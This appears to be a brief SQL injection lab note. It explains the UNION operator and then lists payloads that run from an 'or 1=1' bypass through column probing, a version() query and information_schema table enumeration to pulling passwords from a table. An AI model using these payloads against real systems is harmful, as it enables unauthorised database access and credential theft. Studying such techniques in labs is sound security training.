Firstly trying somethings like
Trying logical operators
<aside> 📌
In SQL, the UNION operator is used to combine the result sets of two or more SELECT statements into a single result set. Each SELECT statement within the UNION operator must have the same number of columns, and the corresponding columns must be of compatible data types.
In the context of SQL Injection , the UNION operator is used to join a malicious SELECT statement to the original SQL query executed by the application. The aim is to trick the database into returning data that it wasn't intended to disclose.
</aside>
jeremy' or 1=1#jeremy' UNION SELECT NULL,NULL,NULL#jeremy' UNION SELECT NULL,NULL,version()#jeremy' UNION SELECT NULL,NULL,table_name FROM information_schema.tables#jeremy' UNION SELECT NULL,NULL,password FROM injection0x01#